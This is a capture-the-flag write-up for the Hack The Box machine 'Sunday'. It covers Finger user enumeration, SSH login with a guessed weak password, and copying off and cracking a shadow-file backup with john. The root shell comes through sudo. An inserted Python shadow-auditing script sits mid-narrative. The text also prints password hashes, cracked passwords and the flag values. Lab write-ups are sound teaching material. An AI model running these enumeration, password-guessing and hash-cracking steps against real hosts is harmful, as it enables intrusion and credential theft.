About

Sunday is a fairly simple machine; however, it runs fairly old software and can be a bit unpredictable at times. It mainly focuses on exploiting the Finger service as well as the use of weak credentials.

Enumeration

Running the script portscan.sh reveals 4 attack vectors: Finger, RPC, HTTPS and SSH.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sudo portscan.sh 10.129.125.78

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ cat PortScan\(10.129.125.78\)

PORT      STATE SERVICE  VERSION
79/tcp    open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
|   GenericLines:
|     No one logged on
|   GetRequest:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions:
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help:
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest:
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie:
|_    Login Name TTY Idle When Where
111/tcp   open  rpcbind  2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  ssl/http Apache httpd 2.4.33 ((Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14)
| tls-alpn:
|_  http/1.1
| http-title: Solaris Dashboard
|_Requested resource was https://10.129.125.78:6787/solaris/
| ssl-cert: Subject: commonName=sunday
| Subject Alternative Name: DNS:sunday
| Not valid before: 2021-12-08T19:40:00
|_Not valid after:  2031-12-06T19:40:00
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.33 (Unix) OpenSSL/1.0.2o mod_wsgi/4.5.1 Python/2.7.14
22022/tcp open  ssh      OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:00:94:32:18:60:a4:93:3b:87:a4:b6:f8:02:68:0e (RSA)
|_  256 da:2a:6c:fa:6b:b1:ea:16:1d:a6:54:a1:0b:2b:ee:48 (ED25519)

Exploitation

Finger

First, using the auxiliary/scanner/finger/finger_users module from Metasploit, I’m able to find 2 users, sammy and sunny.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ msfconsole -q -x 'use auxiliary/scanner/finger/finger_users; set RHOSTS 10.129.125.78; set RPORT 79; set USERS_FILE /usr/share/wordlists/seclists/Usernames/Names/names.txt; run; exit'
[*] Starting persistent handler(s)...
RHOSTS => 10.129.125.78
RPORT => 79
USERS_FILE => /usr/share/wordlists/seclists/Usernames/Names/names.txt
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: noaccess
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: nobody4
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: nobody
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: lp
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: adm
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: dladm
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: netcfg
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: dhcpserv
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: ikeuser
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: netadm
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: bin
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: smmsp
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: root
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: sammy
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: sunny
[+] 10.129.125.78:79      - 10.129.125.78:79 - Found user: sys
[+] 10.129.125.78:79      - 10.129.125.78:79 Users found: adm, bin, dhcpserv, dladm, ikeuser, lp, netadm, netcfg, noaccess, nobody, nobody4, root, sammy, smmsp, sunny, sys
[*] 10.129.125.78:79      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SSH

After a few educated guesses, I’m able to use the credential sunny:sunday to gain a shell as the user sunny.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sshpass -p sunday ssh sunny@10.129.125.78 -p 22022
Last login: Fri Oct 13 04:23:37 2023
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
sunny@sunday:~$ id
uid=101(sunny) gid=10(staff)

Lateral Movement

With a bit of enumeration, I’m able to find some entries in .bash_history. According to the log, the user sunny ran the command cat /backup/shadow.backup, which implies that a backup of the file /etc/shadow exists and is accessible.

sunny@sunday:~$ cat .bash_history
su -
su -
cat /etc/resolv.conf
su -
ps auxwww|grep overwrite
su -
sudo -l
sudo /root/troll
ls /backup
ls -l /backup
cat /backup/shadow.backup
sudo /root/troll
sudo /root/troll
su -
sudo -l
sudo /root/troll
ps auxwww
ps auxwww
ps auxwww
top
top
top
ps auxwww|grep overwrite
su -
su -
cat /etc/resolv.conf
ps auxwww|grep over
sudo -l
sudo /root/troll
sudo /root/troll
sudo /root/troll
sudo /root/troll

By checking the contents of /backup/shadow.backup, I’m able to confirm that the file is a partial backup of /etc/shadow that contains hashed passwords for sammy and sunny.

sunny@sunday:~$ cat /backup/shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
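To show what a world-readable shadow backup actually exposes, here is an added auditing example (not part of the original writeup) that parses the Solaris shadow(5) layout above, classifies each account as locked, passwordless or carrying a crackable crypt(3) hash, and converts the lastchg field into a date. The sample input is constructed from the entries shown on the box; the function and class names are my own.

```python
"""Audit a Solaris-style shadow(5) file: user:password:lastchg:min:max:warn:inactive:expire:flag."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Dict, List, Optional, Tuple

EPOCH = date(1970, 1, 1)  # lastchg is days since this date

# crypt(3) prefixes worth flagging; anything else starting with '$' is reported as unknown.
HASH_ALGOS = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
              "$2a$": "bcrypt", "$2b$": "bcrypt"}

# Constructed sample mirroring /backup/shadow.backup from the writeup (hashes are the ones printed there).
SAMPLE_SHADOW = """\
mysql:NP:::::::
openldap:*LK*:::::::
svctag:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

@dataclass
class ShadowEntry:
    user: str
    state: str                  # "locked", "no-password", "empty", "hashed" or "unknown"
    algo: Optional[str]         # hash algorithm when state == "hashed"
    last_change: Optional[date]

def classify_password(field: str) -> Tuple[str, Optional[str]]:
    """Map the password field to an account state; *LK* may prefix a hash on Solaris."""
    if field.startswith("*LK*"):
        return "locked", None
    if field == "NP":           # Solaris: no password, password login not possible
        return "no-password", None
    if field == "":             # empty field: login without any password
        return "empty", None
    for prefix, algo in HASH_ALGOS.items():
        if field.startswith(prefix):
            return "hashed", algo
    return "unknown", None

def parse_shadow(text: str) -> Dict[str, ShadowEntry]:
    """Parse shadow lines; reject lines that do not have the nine Solaris fields."""
    entries: Dict[str, ShadowEntry] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {raw!r}")
        state, algo = classify_password(fields[1])
        last_change = EPOCH + timedelta(days=int(fields[2])) if fields[2] else None
        entries[fields[0]] = ShadowEntry(fields[0], state, algo, last_change)
    return entries

def crackable_accounts(entries: Dict[str, ShadowEntry]) -> List[str]:
    """Users whose entry carries a real hash: exactly what a leaked backup hands to an offline cracker."""
    return sorted(u for u, e in entries.items() if e.state == "hashed")
```

Run against the real /etc/shadow of a host, this is a quick way to confirm that service accounts are locked and that only expected users carry crackable hashes.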

After exfiltrating the file to the C2 server, I’m able to use john to crack the password for the user sammy, which turns out to be cooldude!.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sshpass -p sunday scp -P 22022 sunny@10.129.125.78:/backup/shadow.backup .

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ john shadow.backup --users=sammy --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 512/512 AVX512BW 16x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

With the credentials found, I’m able to gain a shell as the user sammy.

┌──(m0nk3y@kali)-[~/HTB/Sunday]
└─$ sshpass -p 'cooldude!' ssh sammy@10.129.125.78 -p 22022
Last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
-bash-4.4$ id
uid=100(sammy) gid=10(staff)

Privilege Escalation

Checking the sudo rights of the user sammy shows that I’m able to run any command as any user after entering a password.

-bash-4.4$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

By using that privilege to switch to the superuser, I’m able to gain a shell as the user root.

-bash-4.4$ sudo su
Password:

root@sunday:/home/sammy# id
uid=0(root) gid=0(root)

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

root@sunday:/home/sammy# cat /home/sammy/user.txt
2ce980a3404d0997b734a876f88ea946

root@sunday:/home/sammy# cat /root/root.txt
5e163c81c7d61be51bc246723c755591